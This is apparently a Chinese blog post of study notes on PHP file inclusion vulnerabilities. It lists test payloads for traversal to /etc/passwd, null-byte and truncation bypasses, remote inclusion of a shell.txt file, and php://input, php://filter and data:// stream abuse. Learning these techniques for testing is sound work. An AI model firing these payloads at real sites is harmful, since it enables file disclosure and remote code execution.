#笔记(十五)#文件包含漏洞小结

最新推荐文章于 2022-10-20 16:45:51 发布
最新推荐文章于 2022-10-20 16:45:51 发布
阅读量231 收藏
点赞数
分类专栏: # 漏洞学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43476037/article/details/87464461
版权

2.文件包含(File Inclusion)

  • . 文件包含函数加载的参数没有经过过滤或者严格的定义
本地文件包含
  • windows敏感信息
    在这里插入图片描述
  • 几种经典的测试方法:
    • ?file=…/…/…/…/…/etc/passwdd
    • ?page=file:///etc/passwd
    • ?home=main.cgi
    • ?page=http://www.a.com/1.php
  • 目录遍历
    • ?file=…/…/…/…/…/…/…/…/…/var/lib/locate.db
    • ?file=…/…/…/…/…/…/…/…/…/var/lib/mlocate/mlocate.db
  • 有限制的本地文件包含(各种绕过)
    • %00截断
      • ?file=./…/…/…/…/…/…/…/…/etc/passwd%00
    • %00截断目录遍历
      • ?file=./…/…/…/…/…/…/…/…/var/www/%00
    • 路径长度截断
      • ?file=…/…/…/…/…/…/…/…/…/etc/passwd/././././././.[…]/./././././.
    • 点号截断
      • ?file=…/…/…/…/…/…/…/…/…/boot.ini/………[…]…………
远程文件包含
  • 远程代码执行
    • ?file=[http|https|ftp]?/example.com/shell.txt
  • 利用PHP流input
    • ?file=php://input
  • 利用PHP流filter
    • ?file=php://filter/convert.base64-encode/resource=index.php
  • 利用data URls
    • ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
  • 利用xss执行任意代码
    • ?file=http://127.0.0.1/path/xss.php?xss=phpcode
vircorns
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含漏洞学习笔记(详细)
2301_77451464的博客
03-18 934
文件包含的原理以及各种漏洞,并包含了伪协议的解题思路与过程
文件包含漏洞笔记
weixin_42695055的博客
12-28 141
文件包含漏洞(File Inclusion)是一种最常见的依赖于脚本运行而影响 Web 应用程序的漏洞。当应用程序使用攻击者控制的变量建立一个可执行代码的路径,允许攻击者控制在运行时执行哪个文件时,就会导致文件包含漏洞
文件包含漏洞 笔记
qq_41453632的博客
11-23 211
文件包含漏洞: c:  #include<stdio.h> php: include"config.php" jsp:<include file ="header.jsp" /> index.php的代码: <?php                            if(@$_GET[xss]) {                             @...
文件包含漏洞学习笔记
weixin_43332695的博客
06-10 153
文件包含原理:通过变量动态调用函数文件时,用户可以改变变量,或是没检验,检验被绕过而调用恶意脚本文件。 检测: 白盒:代码审计 黑盒: (1)手工看参数值及功能点:看网址后面的参数值是否为文件或文件名,看该网站的功能点 (2)公开的漏洞 (3)扫描目录的工具 文件分为本地文件和远程文件 本地文件包含:(1)有限制: 强制文件格式限制:开发时代码强制设置文件格式 include($filename.".html"); 如果参数输入x.php(即包含x.php)则寻找目录下的x.php.html文件,没找过该
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
2. 客户端浏览器利用本地包含文件漏洞进行攻击 a) 使用正常合法的小图片,使用工具插入攻击代码 b) 在网站上传带木马的图片 c) 执行文件包含并生成后门 文件包含漏洞的防御措施: 1. 禁用文件包含功能 2. 限制...
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
Web 网站文件上传漏洞和攻击 - 运维安全详细笔记 文件上传漏洞是 Web 应用程序中的一种常见漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。本文将详细介绍文件上传漏洞的原理、实验步骤和防御方法。 一、...
Ext.Net学习笔记之button小结
01-02
1.触发客户端事件 代码如下:”Button1″ runat=”server” Text=”快点我”> <Listeners> ”Greet()”></Click> </Listeners></ext> [removed]function Greet() {alert(“Hello World!”)...
weekyuan#design-patterns#笔记五 装饰者设计模式1
07-25
1. 装饰者设计模式-是什么 2. 装饰者设计模式-定义 3. 装饰者设计模式-模拟网关权限控制 4. 装饰者设计模式-测试
python代码文件(小甲鱼学习笔记
最新发布
11-09
F:\笔记\py\小甲鱼\py代码\猜数字.py F:\笔记\py\小甲鱼\py代码\计时器.py F:\笔记\py\小甲鱼\py代码\连接数据库.py F:\笔记\py\小甲鱼\py代码\以b为分隔符.py ...F:\笔记\py\小甲鱼\py代码\找文件.py
网络安全笔记 -- 文件操作(文件包含漏洞
swy66的博客
09-12 3356
文件操作(文件包含漏洞
CISP-PTE学习总结之基础练习题(二)
千寻的博客
10-20 7529
基础题目一:SQL注入 0x01 题目要求 0x02 解题过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解题过程 基础题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目四:代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解题过程
《WEB安全渗透测试》(13)一个文件上传漏洞的绕过
午夜安全
10-14 698
《WEB安全渗透测试》(13)一个文件上传漏洞的绕过 这个题目是让利用你所学到的知识,测试其过WAF,突破上传获取webshell。经过测试发现,这里有后缀名检测、文件类型检测、文件头检测、文件内容危险函数检测。(1)针对后缀名检测,系统不允许上传.php文件,那么我们使用.Php这种大写的方式上传文件。一般情况下,后缀名绕过包括空格、00截断、大小写、使用其他后缀名(如系统不允许jsp文件,那么我们可以上传jspx文件,类似php、php2、php3等)等方式。...
PHP文件包含漏洞攻防实战
weixin_33785972的博客
02-10 343
本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞,利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。 PHP文件包...
笔试题————网络安全、web安全、渗透测试之笔试总结(二)
热门推荐
Fly_鹏程万里
05-13 1万+
主要讲解内容1.什么是WebShell? 2.什么是网络钓鱼? 3.你获取网络安全知识途径有哪些? 4.什么是CC攻击? 5.Web服务器被入侵后,怎样进行排查? 6.dll文件是什么意思,有什么用?DLL劫持原理 7.0day漏洞 8.Rootkit是什么意思 9.蜜罐 10.ssh 11.DDOS 12.震网病毒: 13.一句话木马 14.Https的作用 15.手工查找后门木马的小技巧 16...
文件包含漏洞(include)-学习笔记
小龙在线
08-21 5573
简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 PHP Stream(流) 属性 支持 受限于 allow_url_fopen NO 受限于allow_url_include 仅 php://input、 php://s
网络安全之文件包含漏洞总结
kali_Ma的博客
03-10 2256
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
文件包含漏洞对公司测试
weixin_30663391的博客
11-22 121
主站是:www.xxxx.biz 环境:linux php nginx,伪静态的。 主站基本是没希望,不过xss很多,懒得去利用。 有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就..........开始看了下dz 7.5的,自己修改了一些东西,尝试了公开的0DAY没戏,各种尝试无果。 最后丢到wvs里面一扫,一会就出来了一个本地包含漏洞,详细继续。 根据WVS扫...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值